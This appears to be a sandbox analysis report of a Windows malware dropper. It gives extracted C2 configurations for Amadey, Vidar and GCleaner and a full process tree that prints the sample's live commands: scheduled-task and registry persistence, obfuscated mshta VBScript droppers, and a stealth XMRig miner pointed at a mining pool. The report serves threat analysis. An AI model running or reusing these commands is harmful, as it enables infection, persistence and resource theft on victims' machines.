Analysis

  • max time kernel
    133s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-12-2024 09:40

General

  • Target

    c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe

  • Size

    7.5MB

  • MD5

    c71460537b9584b5f550df694b80c9aa

  • SHA1

    bf96ffa379cb297d91d994a63e04f03d94eb8139

  • SHA256

    c329c73a0c1f6f156cc7a662abdf5e7ea30ed8b8f4b35253bf7f2435b83445c8

  • SHA512

    613c7165a1572c72fae2c721bf0e896304eb52eb04463333fae39f699d6da5390a7ee103907c245bd8537a3a183e6e76610a1bfc557e029ae58bf23ef269dfea

  • SSDEEP

    98304:gF8b2yodBaTJlvTuD17o2J5nsIsrInNI1TV++ykbHMOCXO6:g2b8SLA1M2sIX0kk5Ce6

Malware Config

Extracted

Family

amadey

Version

2.61

Botnet

a6b927

C2

http://185.215.113.25

Attributes
  • install_dir

    e8a12a95fa

  • install_file

    sqtvvs.exe

  • strings_key

    1cc248008096bc1c8e6f468b951db183

  • url_paths

    /f6vskbW/index.php

rc4.plain

Extracted

Family

vidar

Version

41.1

Botnet

933

C2

https://mas.to/@bardak1ho

Attributes
  • profile_id

    933

Extracted

Family

gcleaner

C2

gcl-page.biz

194.145.227.161

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Fabookie payload 1 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Fabookie family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Onlylogger family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • OnlyLogger payload 2 IoCs
  • Vidar Stealer 1 IoCs
  • XMRig Miner payload 1 IoCs
  • Blocklisted process makes network request 11 IoCs
  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 38 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 18 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1548
    • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
      "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:4524
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        3⤵
          PID:2944
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:920
        • C:\Users\Admin\AppData\Roaming\services64.exe
          "C:\Users\Admin\AppData\Roaming\services64.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          PID:3240
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
            4⤵
              PID:468
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2916
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              4⤵
              • Executes dropped EXE
              PID:3092
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3676
        • C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
          "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:184
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 1020
            3⤵
            • Program crash
            PID:368
        • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
          "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:100
        • C:\Users\Admin\AppData\Local\Temp\inst001.exe
          "C:\Users\Admin\AppData\Local\Temp\inst001.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3608
          • C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
            C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:816
        • C:\Users\Admin\AppData\Local\Temp\install.exe
          "C:\Users\Admin\AppData\Local\Temp\install.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4348
          • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
            "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3652
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
              4⤵
              • System Location Discovery: System Language Discovery
              PID:740
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4732
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F
              4⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:228
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1124
            3⤵
            • Program crash
            PID:5092
        • C:\Users\Admin\AppData\Local\Temp\setup.exe
          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1860
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 744
            3⤵
            • Program crash
            PID:2300
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 812
            3⤵
            • Program crash
            PID:3828
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 844
            3⤵
            • Program crash
            PID:1352
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 972
            3⤵
            • Program crash
            PID:4900
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1036
            3⤵
            • Program crash
            PID:2244
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 824
            3⤵
            • Program crash
            PID:3912
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1192
            3⤵
            • Program crash
            PID:228
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1308
            3⤵
            • Program crash
            PID:4976
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1444
            3⤵
            • Program crash
            PID:1828
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1664
            3⤵
            • Program crash
            PID:4828
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\64042477274.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4460
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\38777644794.exe" /mix
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3584
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\32748471338.exe" /mix
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4860
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 2056
            3⤵
            • Program crash
            PID:1308
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4740
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im "setup.exe" /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:5048
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1804
            3⤵
            • Program crash
            PID:2244
        • C:\Users\Admin\AppData\Local\Temp\7.exe
          "C:\Users\Admin\AppData\Local\Temp\7.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1960
        • C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
          "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:956
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
            3⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2448
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4744
              • C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
                ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3608
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                  6⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  PID:1908
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:4752
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run ("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0 , trUE ) )
                  6⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  PID:3076
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2320
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:4848
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:4556
                    • C:\Windows\SysWOW64\control.exe
                      control ..\kZ_AmsXL.6G
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:4024
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                        9⤵
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:2332
                        • C:\Windows\system32\RunDll32.exe
                          C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                          10⤵
                            PID:4764
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
                              11⤵
                              • Blocklisted process makes network request
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:3224
                              • C:\Users\Admin\AppData\Local\Temp\e59a3a9.exe
                                "C:\Users\Admin\AppData\Local\Temp\e59a3a9.exe"
                                12⤵
                                  PID:5036
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 780
                                    13⤵
                                    • Program crash
                                    PID:3356
                            • C:\Users\Admin\AppData\Local\Temp\e59da68.exe
                              "C:\Users\Admin\AppData\Local\Temp\e59da68.exe"
                              10⤵
                                PID:564
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 780
                                  11⤵
                                  • Program crash
                                  PID:2096
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill -f /Im "sfx_123_206.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1056
              • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1464
                • C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp" /SL5="$90112,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3660
                  • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2416
                    • C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp" /SL5="$90252,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:3468
              • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                2⤵
                • Executes dropped EXE
                PID:5012
              • C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
                "C:\Users\Admin\AppData\Local\Temp\lijun-game.exe"
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:548
              • C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
                "C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Enumerates connected drives
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:3956
                • C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
                  "C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" AI_EUIMSI=1 APPDIR="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner" SECONDSEQUENCE="1" CLIENTPROCESSID="3956" CHAINERUIPROCESSID="3956Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature,RequiredApplication_1" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_PREREQFILES="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner%20Installation.exe" AI_PREREQDIRS="C:\Users\Admin\AppData\Roaming\Cleaner" AI_MISSING_PREREQS="Required Application" AI_DETECTED_INTERNET_CONNECTION="1" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733151003 " TARGETDIR="C:\" AI_INSTALL="1" AI_SETUPEXEPATH_ORIGINAL="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"
                  3⤵
                  • Executes dropped EXE
                  • Enumerates connected drives
                  • System Location Discovery: System Language Discovery
                  • System Time Discovery
                  • Modifies system certificate store
                  PID:4732
              • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2220
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 1660
                  3⤵
                  • Program crash
                  PID:4472
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4348 -ip 4348
              1⤵
                PID:2544
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1860 -ip 1860
                1⤵
                  PID:3804
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2220 -ip 2220
                  1⤵
                    PID:4024
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 184 -ip 184
                    1⤵
                      PID:2964
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1860 -ip 1860
                      1⤵
                        PID:440
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860
                        1⤵
                          PID:540
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1860 -ip 1860
                          1⤵
                            PID:4844
                          • C:\Windows\system32\msiexec.exe
                            C:\Windows\system32\msiexec.exe /V
                            1⤵
                            • Enumerates connected drives
                            • Drops file in Windows directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4720
                            • C:\Windows\syswow64\MsiExec.exe
                              C:\Windows\syswow64\MsiExec.exe -Embedding 623D34B2B022F91A49405EE1160A6200 C
                              2⤵
                              • Blocklisted process makes network request
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:4348
                            • C:\Windows\system32\srtasks.exe
                              C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                              2⤵
                                PID:3608
                              • C:\Windows\syswow64\MsiExec.exe
                                C:\Windows\syswow64\MsiExec.exe -Embedding 10EEC0538907FA21A386C6467DA73E10
                                2⤵
                                • Blocklisted process makes network request
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                PID:1616
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1860 -ip 1860
                              1⤵
                                PID:396
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1860 -ip 1860
                                1⤵
                                  PID:3080
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860
                                  1⤵
                                    PID:1416
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860
                                    1⤵
                                      PID:4896
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1860 -ip 1860
                                      1⤵
                                        PID:3936
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1860 -ip 1860
                                        1⤵
                                          PID:2236
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1860 -ip 1860
                                          1⤵
                                            PID:1576
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1860 -ip 1860
                                            1⤵
                                              PID:5092
                                            • C:\Windows\system32\vssvc.exe
                                              C:\Windows\system32\vssvc.exe
                                              1⤵
                                              • Checks SCSI registry key(s)
                                              PID:2876
                                            • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                              C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:4940
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 488
                                                2⤵
                                                • Program crash
                                                PID:2068
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4940 -ip 4940
                                              1⤵
                                                PID:4460
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5036 -ip 5036
                                                1⤵
                                                  PID:1176
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 564 -ip 564
                                                  1⤵
                                                    PID:4272

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Config.Msi\e586b1a.rbs

                                                    Filesize

                                                    1KB

                                                    MD5

                                                    dbf422b221c18dd503e9a341d3730f2a

                                                    SHA1

                                                    1df96ac7444b27febd77e1b2d9376ac6196b1e27

                                                    SHA256

                                                    9eb81bb26e5dd9e854aa050fe3864fd480df1c37aaa97dcce75fd16769467e17

                                                    SHA512

                                                    3288fa2645db73b838c59f017ae99030a0b87571d4a97ce8ed46721e4c26a81d36082c40ac2705f36ffc43a9c406789481ca8566ef07604437013c751e1337cc

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

                                                    Filesize

                                                    1KB

                                                    MD5

                                                    67e486b2f148a3fca863728242b6273e

                                                    SHA1

                                                    452a84c183d7ea5b7c015b597e94af8eef66d44a

                                                    SHA256

                                                    facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

                                                    SHA512

                                                    d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

                                                    Filesize

                                                    436B

                                                    MD5

                                                    971c514f84bba0785f80aa1c23edfd79

                                                    SHA1

                                                    732acea710a87530c6b08ecdf32a110d254a54c8

                                                    SHA256

                                                    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

                                                    SHA512

                                                    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

